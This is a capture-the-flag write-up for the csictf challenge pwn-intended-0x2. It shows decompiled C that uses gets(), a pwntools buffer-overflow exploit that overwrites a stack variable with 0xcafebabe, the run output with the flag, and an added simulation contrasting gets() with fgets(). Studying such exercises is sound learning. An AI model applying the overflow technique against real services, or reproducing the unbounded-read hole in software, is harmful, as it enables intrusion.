rishitsaiya 88ee32973e Added Pwn Challenges 2020-07-31 18:24:27 +05:30

pwn-intended-0x2

The main idea for finding the flag is to overwrite the checked variable with the correct hex value after a run of padding.

Step-1:

After I downloaded pwn-intended-0x2, I reversed it with IDA and got this decompiled code:

#include <stdio.h>
#include <stdlib.h>

typedef unsigned long undefined8;   /* decompiler's name for an 8-byte return type */

undefined8 main(void)

{
  char local_38 [44];   /* 44-byte input buffer */
  int local_c;          /* sits directly after local_38 on the stack */

  local_c = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Welcome to csictf! Where are you headed?");
  gets(local_38);       /* no length check: input longer than 44 bytes overwrites local_c */
  puts("Safe Journey!");
  if (local_c == -0x35014542) {   /* -0x35014542 is 0xcafebabe read as a signed 32-bit int */
    puts("You\'ve reached your destination, here\'s a flag!");
    system("/bin/cat flag.txt");
  }
  return 0;
}

Step-2:

local_c is compared against -0x35014542, which is 0xcafebabe interpreted as a signed 32-bit integer. Since local_38 is a 44-byte array and local_c sits right after it on the stack, we have to write 0xcafebabe (little-endian) after 44 bytes of padding.

Step-3:

I wrote a simple pwntools script, rev_exploit.py, to exploit the service:

import pwn

r = pwn.remote('chall.csivit.com', 30007)

# 44 bytes fill local_38; the next 4 bytes land in local_c.
# p32() packs 0xcafebabe little-endian, so local_c reads back as -0x35014542.
payload = b"A" * 44 + pwn.p32(0xcafebabe)

r.sendline(payload)
r.interactive()
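The stack layout from Step 2 and the payload from Step 3, as an added worked example that is not part of the original writeup: a pure-Python model (no pwntools needed, so it runs offline) of main's frame with local_38 followed by local_c. It shows why the decompiler prints 0xcafebabe as -0x35014542, how an unbounded gets()-style read lets the four bytes after the padding overwrite local_c, and that a bounded fgets()-style read of at most 44 bytes leaves local_c untouched. The Frame class, the 8 spare bytes past local_c (so the terminating NUL has somewhere to land) and the fgets-style fix are assumptions of this example, not details from the page.

```python
import struct

BUF_SIZE = 44        # sizeof(local_38) in the decompiled main
TARGET = 0xcafebabe  # the constant local_c is compared against, as an unsigned value
CHECK = -0x35014542  # the same constant as the decompiler printed it (signed C int)
SPARE = 8            # assumed: room past local_c so the NUL written by gets() has somewhere to land


def signed32(value):
    """Reinterpret a 32-bit pattern as a C int, the way the decompiler prints it."""
    value &= 0xffffffff
    return value - 0x100000000 if value & 0x80000000 else value


def build_payload(padding=BUF_SIZE, value=TARGET):
    """Fill local_38 with padding, then append `value` little-endian so it lands in local_c."""
    return b"A" * padding + struct.pack("<I", value)


class Frame:
    """Toy model of main's frame: char local_38[44] followed directly by int local_c.

    Memory starts zeroed, matching `local_c = 0` in the decompiled code.
    """

    def __init__(self):
        self.mem = bytearray(BUF_SIZE + 4 + SPARE)

    def gets(self, stdin):
        """Unbounded read like gets(): copy up to the newline, however long the line is."""
        data = stdin.split(b"\n", 1)[0] + b"\x00"
        if len(data) > len(self.mem):
            raise MemoryError("write runs past the modelled frame")
        self.mem[:len(data)] = data
        return self

    def fgets(self, stdin, size):
        """Bounded read like fgets(buf, size, stdin): at most size-1 bytes, then a NUL."""
        data = stdin.split(b"\n", 1)[0][:size - 1] + b"\x00"
        self.mem[:len(data)] = data
        return self

    def local_c(self):
        """Read local_c the way the compiled comparison does: a signed little-endian int."""
        return struct.unpack("<i", self.mem[BUF_SIZE:BUF_SIZE + 4])[0]

    def reaches_flag(self):
        """The `if (local_c == -0x35014542)` branch from main."""
        return self.local_c() == CHECK


if __name__ == "__main__":
    line = build_payload() + b"\n"
    vuln = Frame().gets(line)
    fixed = Frame().fgets(line, BUF_SIZE)
    print("0xcafebabe as signed int:", hex(signed32(TARGET)))
    print("gets():  local_c = %#x, flag branch taken: %s"
          % (vuln.local_c() & 0xffffffff, vuln.reaches_flag()))
    print("fgets(): local_c = %#x, flag branch taken: %s"
          % (fixed.local_c() & 0xffffffff, fixed.reaches_flag()))
```

Running the file shows both outcomes side by side: with the gets()-style read local_c becomes 0xcafebabe and the flag branch is taken, while the fgets()-style read with size 44 stops after 43 bytes and local_c stays 0, which is the whole fix for this class of bug.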

Step-4:

When I ran python3 rev_exploit.py, I got this output:

[+] Opening connection to chall.csivit.com on port 30007: Done
[*] Switching to interactive mode
Welcome to csictf! Where are you headed?
Safe Journey!
You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive 
$
[*] Interrupted

Voila! I got the flag there.

Step-5:

Finally, the flag is: csictf{c4n_y0u_re4lly_telep0rt?}